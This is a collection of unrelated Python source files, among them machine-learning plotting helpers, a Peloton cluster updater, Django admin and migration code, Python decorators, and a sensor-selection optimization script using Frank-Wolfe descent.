scaled_X = X.copy()
for X_to_scale in tqdm(scaled_X):
yield scaler.transform(X_to_scale.reshape(1, -1)).reshape(X_to_scale.shape)
def pca(X:np.array, y:np.array) -> (np.array, np.array):
'''
plots a scatter showing the transformed dataset (if it is 2D) with different coloring for the different classes
Parameters:
- X: Array containing the original x values [numpy.array]
- y: Array containing the labels [numpy.array]
Returns:
- X_transformed: Array containing the transformed x values [numpy.array]
- y: Array containing the labels [numpy.array]
'''
## init pca with two components
pca = PCA(n_components = 2)
## copy data to be sure not to accidentally overwrite something
pca_x = X.copy()
## check whether data has more than two dimensions (example shape of [60, 28, 28])
if pca_x.shape.__len__() > 2:
print("Dimension too high, X gets reshaped")
## if yes, reshape (in this case [60, 784])
pca_x = X.copy().reshape(X.shape[0], -1)
## fit PCA, transform data
X_transformed = pca.fit_transform(pca_x, y)
return X_transformed, y
def plot_reduced_data(X_new:np.array, y:np.array) -> None:
'''
plots a scatter showing the transformed dataset (if it is <= 2D) with different coloring for the different classes
Parameters:
- X_new: Array containing the transformed x values [numpy.array]
- y: Array containing the labels [numpy.array]
Returns:
- None
'''
## make DataFrame from transformed x values, add information about labels, rename the columns
reduced_data = pd.DataFrame(X_new).reset_index(drop = True)
if reduced_data.columns.__len__() == 1:
reduced_data["y"] = 0
reduced_data.columns = ["x","y"]
reduced_data["Label"] = y.reset_index(drop = True)
## make a list of SubDataSets that each only contain data about respective label
subdata = [reduced_data[reduced_data["Label"] == label] for label in np.unique(y)]
## set size, init figure
size = 10
fig=plt.figure(figsize=(2*size,size))
## add plots
ax = fig.add_subplot()
colors = list(mcolors.TABLEAU_COLORS) + list(mcolors.BASE_COLORS)
for i in range(len(subdata)):
ax.scatter(subdata[i]["x"], subdata[i]["y"], color = colors[i], label = i)
## update layout, without ticklabels and the grid to be on
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.grid(True)
## set title, new legend, save figure, show plot
ax.set_title(f"Plot of the reduced data after PCA, colored in respective label", size=2*size)
if subdata.__len__() > 12:
ax.legend().set_visible(False)
else:
ax.legend(prop={'size': 1.5*size})
plt.show()
def evaluate_model(clf:object, X:np.array, y:np.array) -> None:
'''
evaluates the given model with given data, prints different metrices [accuracy, precision, recall, f1 score]
Parameters:
- clf: model to evaluate [object]
- X: x values [np.array]
- y: labels [np.array]
'''
## split data to train and test samples, fit classifier
X_train, X_test, y_train, y_test = train_test_split(X, y)
clf.fit(X_train, y_train)
## init plot
size = 10
fig=plt.figure(figsize=(2*size,size))
ax=fig.add_subplot()
## plot confusion matrix
plot_confusion_matrix(clf, X_test, y_test, normalize="true", ax = ax, cmap=plt.cm.Blues)
## predict test samples
y_pred = clf.predict(X_test)
## calculate the metrics
accuracy = balanced_accuracy_score(y_test, y_pred)
precision = precision_score(y_test, y_pred,average="weighted")
recall = recall_score(y_test, y_pred,average="weighted")
f1 = f1_score(y_test, y_pred,average="weighted")
## print results
print(f"Acc: {accuracy * 100:.2f}%")
print(f"Precision: {precision:.2f}")
print(f"Recall: {recall:.2f}")
print(f"F1 score: {f1:.2f}") |
23,115 | 2a9714c75b065746a082cad00e3364a3d3aaf142 | from __future__ import absolute_import
import yaml
import json
import json_delta
from prompter import yesno
from thrift import TSerialization
from thrift.protocol.TJSONProtocol import TSimpleJSONProtocolFactory
from aurora.client import AuroraClientZK
from app import App, CronApp
# Currently DB schema migration is executed only in hostmgr so we have
# to update hostmgr first.
# TODO: use a separate binary for DB migration
PELOTON_APPS = [
"hostmgr",
"resmgr",
"placement",
"placement_stateful",
"placement_stateless",
"jobmgr",
"archiver",
"aurorabridge",
]
CRON_APPS = ["watchdog"]
def update_callback(app):
"""
Callback function for updating Peloton apps so that we can run
integration tests in-between updates of each app.
"""
print("Update callback invoked for %s" % app.name)
# TODO: Add integration tests here
return True
class Cluster(object):
"""
Representation of a Peloton cluster
"""
def __init__(self, cfg_file, **kwargs):
self.auto_migrate = False
self.use_host_pool = False
for k, v in kwargs.iteritems():
setattr(self, k, v)
self.client = AuroraClientZK.create(
zk_endpoints=self.zookeeper, zk_path=self.aurora_zk_path
)
self.cfg_file = cfg_file
self.apps = []
for app in PELOTON_APPS:
app_cfg = getattr(self, app, None)
if app_cfg is None:
continue
self.apps.append(App(name=app, cluster=self, **app_cfg))
for app in CRON_APPS:
app_cfg = getattr(self, app, None)
if app_cfg is not None:
self.apps.append(CronApp(name=app, cluster=self, **app_cfg))
else:
print(
"Skipping cron app, existing cron will have to be disabled using `aurora deschedule` command"
)
@staticmethod
def load(cfg_file):
"""
Load the cluster config from a yaml file
"""
with open(cfg_file, "r") as f:
try:
cfg = yaml.load(f)
except yaml.YAMLError as ex:
print("Failed to unmarshal cluster config %s" % cfg_file)
raise ex
return Cluster(cfg_file, **cfg)
def diff_config(self, app, verbose=False):
"""
Print the diff between current and desired job config
"""
print(">>>>>>>> Job config diff for %s <<<<<<<<" % app.name)
cfg_dicts = []
factory = TSimpleJSONProtocolFactory()
for cfg in app.current_job_config, app.desired_job_config:
if cfg:
cfg_json = TSerialization.serialize(
cfg, protocol_factory=factory
)
cfg_dict = json.loads(cfg_json)
# Unset task resources to avoid confusing the job config differ
cfg_dict["taskConfig"]["resources"] = None
else:
cfg_dict = {}
cfg_dicts.append(cfg_dict)
if verbose:
for cfg_dict in cfg_dicts:
print(json.dumps(cfg_dict, indent=4, sort_keys=True))
for line in json_delta.udiff(cfg_dicts[0], cfg_dicts[1]):
print(line)
def update(self, force, verbose):
"""
Rolling update the Peloton apps in the cluster
"""
# Print the job config diffs
print('Update Peloton cluster "%s" to new config: ' % self.name)
for app in self.apps:
self.diff_config(app, verbose)
if not force and not yesno("Proceed with the update ?"):
return
updated_apps = []
for app in self.apps:
updated_apps.append(app)
if not app.update_or_create_job(update_callback):
# Rollback the updates for all apps that have been updated
self.rollback(updated_apps)
return False
return True
def rollback(self, apps):
"""
Rollback the updates to the list of apps in the cluster
"""
while len(apps) > 0:
app = apps.pop()
print("Rolling back app %s ..." % app.name)
app.rollback_job()
|
23,116 | 8b67d208a3ba90666074be88ec41c92828ae88d5 | def missing_number(first_list, second_list):
answer_to_return = 0
a = len(first_list)
b = len(second_list)
if (not first_list and not second_list) or (a == b) :
answer_to_return = 0
else:
first_list.sort()
second_list.sort()
if(a > b):
answer_to_return = first_list[-1]
else:
answer_to_return = second_list[-1]
return answer_to_return
|
23,117 | 260328ffb9ba1764f25bbc8a4a9bc8c62c8441c3 | from django.contrib import admin
from .models import Category,Product
# Register your models here.
class CategoryAdmin(admin.ModelAdmin):
fields = ("name",)
admin.site.register(Category,CategoryAdmin)
class ProductAdmin(admin.ModelAdmin):
fields = ('category','name','Image','description','price','max_quantity','available',)
list_display = ('name','category','price','max_quantity','available','created',)
list_filter = ('available','created','category',)
list_editable = ('price','max_quantity','available',)
admin.site.register(Product, ProductAdmin) |
23,118 | 863f7a6f0941e58297ddd327582061dc9114503e | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""SeqIO postprocessors for wikidiff tasks."""
import json
from language.fruit import tf_utils
import tensorflow as tf
@tf.autograph.experimental.do_not_convert
def postprocess_wikidiff(
output,
vocabulary,
normalize_fn,
is_target=False,
example=None,
):
"""Applies normalization to outputs."""
del is_target
inputs = tf_utils.maybe_decode(
vocabulary.decode_tf(example["inputs"]).numpy())
targets = tf_utils.maybe_decode(output)
normalized_inputs, normalized_targets = normalize_fn(inputs, targets)
results = {
"inputs":
inputs,
"targets":
targets,
"normalized_inputs":
normalized_inputs,
"normalized_targets":
normalized_targets,
"generatable_surfaces":
json.loads(tf_utils.maybe_decode(example["generatable_surfaces"])),
}
return results
|
23,119 | ffd6fc0d68bf907d3a77d5ca0fb01df607ad85f4 | class _Decorator:
def __init__(self):
self._func = None
def _call(self, *args, **kwargs):
return self._func(*args, **kwargs)
def __call__(self, func):
self._func = func
return self._call
class _DecoratorDecorator(_Decorator):
def __init__(self, base: _Decorator = None):
self._base = base
super().__init__()
def _call(self, *args, **kwargs):
if self._base is None:
return super()._call(*args, **kwargs)
return self._base._call(*args, **kwargs)
def __call__(self, func):
self._func = func
if self._base is not None:
self._base.__call__(func)
return self._call
class debug(_DecoratorDecorator):
def _call(self, *args, **kwargs):
print(f'DEBUG: name={self._func.__name__}')
print(f'DEBUG: {args=}')
print(f'DEBUG: {kwargs=}')
result = super()._call(*args, **kwargs)
print(f'DEBUG: {result=}')
return result
class Tracker(_DecoratorDecorator):
def __init__(self, base=None):
super().__init__(base=base)
self._calls = {}
def _call(self, *args, **kwargs):
result = super()._call(*args, **kwargs)
call = {
'args': args,
'kwargs': kwargs,
'return': result
}
if self._func.__name__ not in self._calls:
self._calls[self._func.__name__] = [call]
else:
self._calls[self._func.__name__].append(call)
return result
def __getitem__(self, name):
return self._calls[name]
def __str__(self) -> str:
return str(self._calls)
def __iter__(self):
return iter(self._calls)
track = Tracker()
class memoize(_DecoratorDecorator):
def __init__(self, base: _Decorator = None):
super().__init__(base)
self.cache = {}
def _call(self, *args, **kwargs):
key = (tuple(args), tuple(sorted(kwargs.items())))
if key in self.cache:
return self.cache[key]
result = super()._call(*args, **kwargs)
self.cache[key] = result
return result
@memoize(track)
def foo(x, y):
return x + y
for _ in range(500000):
foo(3, 5)
print(len(track['foo']))
|
23,120 | 6f424a788b72c7ebb0e13e7102f9a8503daa72d9 | # Generated by Django 3.0.8 on 2020-07-20 01:16
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('jobs', '0002_auto_20200708_2203'),
('accounts', '0002_models'),
('projects', '0004_add_project_temporary'),
]
operations = [
migrations.AlterField(
model_name='project',
name='account',
field=models.ForeignKey(help_text='Account that the project belongs to.', on_delete=django.db.models.deletion.CASCADE, related_name='projects', to='accounts.Account'),
),
migrations.AlterField(
model_name='snapshot',
name='job',
field=models.ForeignKey(blank=True, help_text='The job that created the snapshot', null=True, on_delete=django.db.models.deletion.SET_NULL, to='jobs.Job'),
),
]
|
23,121 | d5d7d8f1f9e600f17671ad74556fd7aff2bd1f66 | import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import random
import time
import copy
import itertools
from scipy.integrate import quad
from scipy.spatial import KDTree
from scipy.optimize import brentq
def return_zj(selectRates,d):
return lambda x: np.prod(1. - np.array(selectRates)*(x-d))
def comp1(selectRates,d,removedRate):
return lambda x: -(x-d)*np.prod(1. - np.array(selectRates)*(x-d))
def comp2(selectRates,d,max_rate):
return -1./max_rate**2 * np.prod(1. - np.array(selectRates)*(1./max_rate))
def objective_function_MinAge(N, d, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea):
objFn = 0.
tempObjFn = []
for p in range(len(selectedPartitionsArea)):
selectRates = []
if selectedPartitionsArea[p] != 0:
for s in range(len(allPossibleSets[p])):
idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
selectRates.append(ratePerSensor[idx]) #select the corresponding rates
r_max = max(selectRates)
result = quad(return_zj(selectRates,d), d, d+1./r_max)
tempObjFn.append(d+result[0])
else:
tempObjFn.append(0.)
objFn = np.sum(tempObjFn*selectedPartitionsArea)/np.sum(selectedPartitionsArea)
return objFn
def gradient_obj_fn_MinAge(N, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea,d):
grad_MinAge = np.zeros(int(numSelectedSensors))
#for ii in range(numSelectedSensors):
for p in range(len(selectedPartitionsArea)):
selectedRates = []
if selectedPartitionsArea[p] != 0:
for s in range(len(allPossibleSets[p])):
idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
selectedRates.append(ratePerSensor[idx])
max_rate = max(selectedRates)
for s in range(len(allPossibleSets[p])):
idx = np.where(setofSelectedSensors == allPossibleSets[p][s])[0][0]
if ratePerSensor[idx] == max_rate:
temp1 = comp1(np.delete(selectedRates,s),d,selectedRates[s])
result = quad(temp1, d, d+1./max_rate)
temp2 = comp2(selectedRates,d,max_rate)
grad_MinAge[idx] = grad_MinAge[idx] + (result[0]+temp2)*selectedPartitionsArea[p]/np.sum(selectedPartitionsArea)
else:
temp1 = comp1(np.delete(selectedRates,s),d,selectedRates[s])
result = quad(temp1, d, d+1./max_rate)
grad_MinAge[idx] = grad_MinAge[idx] + (result[0])*selectedPartitionsArea[p]/np.sum(selectedPartitionsArea)
return grad_MinAge
def frank_wolfe(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, t, capacity,d):
# update x (your code here)
# We implement a method we found in some book that describes FW update method
grad = gradient_obj_fn_MinAge(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea,d)
idx = np.argmax(np.abs(grad))
s = np.zeros(len(ratePerSensor))
s[idx] = -capacity * np.sign(grad[idx])
eta = 2./(t+2.)
ratePerSensor = ratePerSensor + eta*(s-ratePerSensor)
ratePerSensor[ratePerSensor<=0]=1./d
return ratePerSensor
def descent(N,update, d, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, capacity, T=int(250)):
ratePerSensor = 1.*np.ones(int(numSelectedSensors))
obj_fn = []
l1 = []
for t in range(T):
# update A (either subgradient or frank-wolfe)
ratePerSensor = update(N,ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea, t, capacity, d)
# record error and l1 norm
if (t % 1 == 0) or (t == T - 1):
l1.append(np.sum(abs(ratePerSensor)))
obj_fn.append(objective_function_MinAge(N,d, ratePerSensor, numSelectedSensors, setofSelectedSensors, allPossibleSets, selectedPartitionsArea))
#assert not np.isnan(obj_fn[-1])
return ratePerSensor, obj_fn, l1
def generatePixelsCenters(xPosCenterPixel1, yPosCenterPixel1, pixelLength, pixelWidth, numSquaresperLength, numSquaresperWidth):
coordPixels = []
#coordPixels.append([xPosCenterPixel1,yPosCenterPixel1])
xCoord = xPosCenterPixel1
yCoord = yPosCenterPixel1
for i in range(numSquaresperLength):
if i != 0:
xCoord = xCoord + pixelLength
yCoord = yPosCenterPixel1
for j in range(numSquaresperWidth):
if j != 0:
yCoord = yCoord + pixelWidth
newrow = np.array([xCoord,yCoord])
if i == 0 | j == 0:
coordPixels.append([xPosCenterPixel1,yPosCenterPixel1])
else:
coordPixels = np.vstack([coordPixels, newrow])
return coordPixels
def pixelisInCircle(sensor,sensorRadius,pixel,coordPixels,coordSensors):
isInCircle = 0
if np.sqrt( (coordPixels[pixel][0]-coordSensors[sensor][0])**2 + (coordPixels[pixel][1]-coordSensors[sensor][1])**2 ) <= sensorRadius:
isInCircle = 1
return isInCircle
def findsubsets(s, n):
return list(itertools.combinations(s, n))
def findPartitionsAreas(pixelLength, pixelWidth, coordPixels,coordSensors,sensorRadius,N):
tempPartitionsPixels = np.zeros(2**N-1)
partitionsPixels = np.zeros(2**N-1)
temp = np.zeros(2**N-1)
temp1 = []
allPossibleSets = []
for ii in range(1,N+1):
hello = findsubsets(np.arange(1,N+1,1),ii)
#hello1 = (np.asarray(hello))
for jj in range(len(hello)):
allPossibleSets.append(list(hello[jj]))
for pixel in range(len(coordPixels)):
for sensor in range(N):
if pixelisInCircle(sensor,sensorRadius,pixel,coordPixels,coordSensors) == 1:
tempPartitionsPixels[sensor] = tempPartitionsPixels[sensor] + 1
if np.sum(tempPartitionsPixels) > 1:
idxOnes = np.nonzero(tempPartitionsPixels)
for ii in range(idxOnes[0].size):
temp1.append(idxOnes[0][ii]+1)
idxPartition = allPossibleSets.index(temp1)
temp[idxPartition] = 1
else:
temp = tempPartitionsPixels
partitionsPixels = partitionsPixels + temp
tempPartitionsPixels = np.zeros(2**N-1)
temp = np.zeros(2**N-1)
temp1 = []
return partitionsPixels*pixelLength*pixelWidth, allPossibleSets
################ OLD MODEL #########################
def baselineModel(ratePerSensor , d, partitionsArea , allPossibleSets, scalingFactor):
areaWeightedAge = 0.
coverageArea = np.sum(partitionsArea)
AgePerPartition = []
for ii in range(len(partitionsArea)):
n = len(allPossibleSets[ii])
tempAge = d + (1./(n+1.))*(1/ratePerSensor)
#tempAge = (n+2.)/(n+1.)*(1/ratePerSensor)
AgePerPartition.append(tempAge)
areaWeightedAge = np.sum(partitionsArea*AgePerPartition)/coverageArea
return coverageArea, areaWeightedAge
####### END OF OLD MODEL #######################
##### NEW MODEL (WITH SAMPLING) ################
def sampleIsinBounds(coordSample,coordBox):
isInBox = 0
if (coordSample[0][0] >= coordBox[0] and coordSample[0][0] <= coordBox[1] and coordSample[0][1] >= coordBox[2] and coordSample[0][1] <= coordBox[3]) :
isInBox = 1
return isInBox
def SamplesPerSensor(coordSensor,sensorRadius,coordBox,num_samples_per_sensor):
coordSamplesPerSensor = []
numIsInCircle = 0
for ii in range(num_samples_per_sensor):
theta = 2*np.pi*np.random.rand(1,1)
r = sensorRadius*np.sqrt(np.random.rand(1,1))
x, y = r * np.cos(theta) + coordSensor[0]*np.ones([1,1]), r * np.sin(theta) + coordSensor[1]*np.ones([1,1])
temp = np.concatenate((x,y),axis=1)
if sampleIsinBounds(temp,coordBox) == 1:
coordSamplesPerSensor.append([])
coordSamplesPerSensor[numIsInCircle].append(temp)
numIsInCircle = numIsInCircle + 1
return numIsInCircle, coordSamplesPerSensor
def sampleisInCircle(sensorRadius,samplePoint,coordSamplesPerSensor,coordSensors):
isInCircle = 0
if np.sqrt( (coordSamplesPerSensor[0][0][0]-coordSensors[0])**2 + (coordSamplesPerSensor[0][0][1]-coordSensors[1])**2 ) <= sensorRadius:
isInCircle = 1
return isInCircle
def computeAgeandArea(N,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSensors):
allPartitions = []
samplesPerPartition = []
for ii in range(len(coordSamplesPerSensor)):
templistofPartitions = []
for jj in range(N):
if sampleisInCircle(sensorRadius,ii,coordSamplesPerSensor[ii],coordSensors[jj,:]):
templistofPartitions.append(jj+1)
#creating list of non-empty partitions
if templistofPartitions not in allPartitions:
allPartitions.append(templistofPartitions)
l = len(samplesPerPartition)
samplesPerPartition.append(0)
samplesPerPartition[l] = samplesPerPartition[l] + 1
else:
# Find where does this partition fall and add a sample to the sample tube
temp = allPartitions.index(templistofPartitions)
samplesPerPartition[temp] = samplesPerPartition[temp] + 1
return allPartitions, samplesPerPartition
def newbaselineModel(capacity, mu, N, d, coordSensors, sensorRadius, coordBox, num_samples_per_sensor, scalingFactor):
ratePerSensor = capacity/(mu*d*N)
areaWeightedAge = 0.
coverageArea = 0.
allPartitions = []
samplesPerPartition = []
appearanceOfaPartition = []
agePerPartition = []
percentageSamplesPerPartition = []
for ii in range(N):
#Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[ii,:],sensorRadius,coordBox,num_samples_per_sensor)
#Step 2: check where does each sample fall
tempallPartitions, tempsamplesPerPartition = computeAgeandArea(N,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSensors)
for jj in range(len(tempallPartitions)):
if tempallPartitions[jj] not in allPartitions:
allPartitions.append(tempallPartitions[jj])
samplesPerPartition.append(tempsamplesPerPartition[jj])
#percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
appearanceOfaPartition.append(1)
else:
temp = allPartitions.index(tempallPartitions[jj])
samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
#percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
coverageArea = np.sum(areaPerPartition)
for ii in range(len(allPartitions)):
n = len(allPartitions[ii])
tempAge = d + (1./(n+1.))*(1/ratePerSensor)
agePerPartition.append(tempAge)
areaWeightedAge = np.sum(areaPerPartition*agePerPartition)/coverageArea
return coverageArea, areaWeightedAge
def newSensSelecModel(N, d, capacity, mu, coordSensors, sensorRadius, coordBox, num_samples_per_sensor_sub, num_samples_per_sensor, scalingFactor, lam, areaR, thresh = 2.):
areaWeightedAge = 0.
coverageArea = 0.
numSelectedSensors = N
setofSelectedSensors = []
setofSensors = np.arange(1,N+1,1)
allPartitions = []
samplesPerPartition = []
appearanceOfaPartition = []
agePerPartition = []
percentageSamplesPerPartition = []
k = 4.
#np.ceil((rectangleLength/sensorRadius)*1.) - 5.
if int(N)>int(k):
numSelectedSensors = int(k)
ratePerSensor = capacity/(numSelectedSensors*mu*d)
#lam = d*(1.+1./2.*numSelectedSensors)
new_max = 0.
for ii in range(int(numSelectedSensors)):
new_max = 0.
for jj in range(N):
if jj+1 not in setofSelectedSensors:
#Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[jj,:],sensorRadius,coordBox,num_samples_per_sensor_sub)
#Step 2: compute the 'b' function
#b_new, tempcoverageArea, tempareaWeightedAge = new_compute_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, sensorRadius, num_samples_per_sensor, numIsInCircle, coordSamplesPerSensor, oldcoverageArea, oldareaWeightedAge, scalingFactor, areaR, lam)
# Key step: Compute delta_b = b_new - b_old
delta_b = compute_delta_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, jj+1, sensorRadius, num_samples_per_sensor_sub, numIsInCircle, coordSamplesPerSensor, scalingFactor, areaR, lam)
if delta_b >= new_max:
new_max = delta_b
selectedSensor = jj+1
setofSelectedSensors.append(selectedSensor)
coordSelectedSensors = []
count = 0
for ii in range(N):
if ii+1 in setofSelectedSensors:
coordSelectedSensors.append([])
coordSelectedSensors[count].append(coordSensors[setofSelectedSensors[count]-1,:])
count = count + 1
for ii in range(len(setofSelectedSensors)):
#Step 1: for each sensor, sample "samples_per_sensor" points and check how many partitions do they cover
numIsInCircle, coordSamplesPerSensor = SamplesPerSensor(coordSensors[setofSelectedSensors[ii]-1,:],sensorRadius,coordBox,num_samples_per_sensor)
#Step 2: check where does each sample fall
#tempallPartitions, tempsamplesPerPartition = computeAgeandArea(numSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle,coordSelectedSensors)
tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(setofSelectedSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
for jj in range(len(tempallPartitions)):
if tempallPartitions[jj] not in allPartitions:
allPartitions.append(tempallPartitions[jj])
samplesPerPartition.append(tempsamplesPerPartition[jj])
#percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
appearanceOfaPartition.append(1)
else:
temp = allPartitions.index(tempallPartitions[jj])
samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
#percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
coverageArea = np.sum(areaPerPartition)
for ii in range(len(allPartitions)):
n = len(allPartitions[ii])
tempAge = d + (1./(n+1.))*(1/ratePerSensor)
agePerPartition.append(tempAge)
areaWeightedAge = np.sum(areaPerPartition*agePerPartition)/coverageArea
return coverageArea , areaWeightedAge, setofSelectedSensors
def compute_delta_b(N, d, mu, coordSensors, setofSelectedSensors, setofSensors, ratePerSensor, currSensor, sensorRadius, num_samples_per_sensor, numIsInCircle, coordSamplesPerSensor, scalingFactor, areaR, lam):
delta_b = 0.
allPartitions = []
samplesPerPartition = []
appearanceOfaPartition = []
coordSelectedSensors = []
if not setofSelectedSensors:
currSensors = currSensor
coordSelectedSensors.append([])
coordSelectedSensors[0].append(coordSensors[currSensors-1,:])
#coordSelectedSensors = np.array(coordSelectedSensors)
tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
for jj in range(len(tempallPartitions)):
if tempallPartitions[jj] not in allPartitions:
allPartitions.append(tempallPartitions[jj])
samplesPerPartition.append(tempsamplesPerPartition[jj])
#percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
appearanceOfaPartition.append(1)
else:
temp = allPartitions.index(tempallPartitions[jj])
samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
#percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
else:
currSensors = copy.copy(setofSelectedSensors)
currSensors.append(currSensor)
currSensors = np.sort(currSensors)
#Step 2: check where does each sample fall
for ii in range(len(currSensors)):
coordSelectedSensors.append([])
coordSelectedSensors[ii].append(coordSensors[currSensors[ii]-1,:])
#coordSelectedSensors = np.array(coordSelectedSensors)
tempallPartitions, tempsamplesPerPartition = newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle)
for jj in range(len(tempallPartitions)):
if tempallPartitions[jj] not in allPartitions:
allPartitions.append(tempallPartitions[jj])
samplesPerPartition.append(tempsamplesPerPartition[jj])
#percentageSamplesPerPartition.append(tempsamplesPerPartition[jj]/numIsInCircle)
appearanceOfaPartition.append(1)
else:
temp = allPartitions.index(tempallPartitions[jj])
samplesPerPartition[temp] = samplesPerPartition[temp] + tempsamplesPerPartition[jj]
#percentageSamplesPerPartition[temp] = percentageSamplesPerPartition[temp] + tempsamplesPerPartition[jj]/numIsInCircle
appearanceOfaPartition[temp] = appearanceOfaPartition[temp] + 1
percentageSamplesPerPartition = np.array(samplesPerPartition)/np.array(appearanceOfaPartition)/num_samples_per_sensor
areaPerPartition = percentageSamplesPerPartition*np.pi*sensorRadius**2*scalingFactor**2
deltaCoverageArea = 0.
deltaAreaWeightedAge = 0.
for ii in range(len(allPartitions)):
if len(allPartitions[ii]) == 1:
deltaCoverageArea = deltaCoverageArea + lam*areaPerPartition[ii]
deltaAreaWeightedAge = deltaAreaWeightedAge-areaPerPartition[ii]*(d+1./2.*1./ratePerSensor)
else:
l = len(allPartitions[ii])
deltaAreaWeightedAge = deltaAreaWeightedAge + areaPerPartition[ii]*(1./((l+1)*(l)))*1./ratePerSensor
delta_b = deltaCoverageArea + deltaAreaWeightedAge
return delta_b
def newcomputeAgeandArea(currSensors,coordSelectedSensors,sensorRadius,coordSamplesPerSensor,numIsInCircle):
allPartitions = []
samplesPerPartition = []
if np.size(currSensors) > 1:
currSensors = np.sort(currSensors)
#coordSelectedSensors = np.array(coordSelectedSensors)
for ii in range(len(coordSamplesPerSensor)):
templistofPartitions = []
for jj in range(len(coordSelectedSensors)):
if sampleisInCircle(sensorRadius,ii,coordSamplesPerSensor[ii],coordSelectedSensors[jj][0]):
if np.size(currSensors) == 1:
templistofPartitions.append(currSensors)
else:
templistofPartitions.append(currSensors[jj])
#creating list of non-empty partitions
if templistofPartitions not in allPartitions:
allPartitions.append(templistofPartitions)
l = len(samplesPerPartition)
samplesPerPartition.append(0)
samplesPerPartition[l] = samplesPerPartition[l] + 1
else:
# Find where does this partition fall and add a sample to the sample tube
temp = allPartitions.index(templistofPartitions)
samplesPerPartition[temp] = samplesPerPartition[temp] + 1
return allPartitions, samplesPerPartition
######################################################
def compute_b(N, d, mu, partitionsArea, setofSelectedSensors, setofSensors, ratePerSensor, currSensor, allPossibleSets, areaR, lam):
b = 0.
AgePerPartition = []
coveredArea = []
tempP = np.zeros(2**N-1)
newPartitionArea = np.zeros(2**N-1)
if not setofSelectedSensors:
currSensors = np.array(currSensor)
for ii in range(len(partitionsArea)):
if currSensors in allPossibleSets[ii]:
tempP[ii] = tempP[ii] + 1 #check how many sensors cover a particular partition
newPartitionArea[ii] = partitionsArea[ii]
else:
currSensors = copy.copy(setofSelectedSensors)
currSensors.append(currSensor)
for s in range(len(currSensors)):
for ii in range(len(partitionsArea)):
if currSensors[s] in allPossibleSets[ii]:
tempP[ii] = tempP[ii] + 1 #check how many sensors cover a particular partition
newPartitionArea[ii] = partitionsArea[ii]
for ii in range(len(partitionsArea)):
n = tempP[ii]
if n!=0:
tempAge = d + (1./(n+1.))*(1./ratePerSensor)
#tempAge = (n+2.)/(n+1.)*(1./ratePerSensor)
if np.isnan(tempAge):
AgePerPartition.append(0.)
else:
AgePerPartition.append(tempAge)
coveredArea.append(newPartitionArea[ii])
else:
AgePerPartition.append(0.)
coveredArea.append(0.)
totalCoveredArea = np.sum(coveredArea)
areaWeightedAge = np.sum(np.array(coveredArea)*np.array(AgePerPartition))
selectedPartitionsArea = copy.copy(newPartitionArea)
a = areaWeightedAge + lam*(areaR-totalCoveredArea)
a_empty = lam*areaR
b = a_empty-a
return b, totalCoveredArea, areaWeightedAge, selectedPartitionsArea
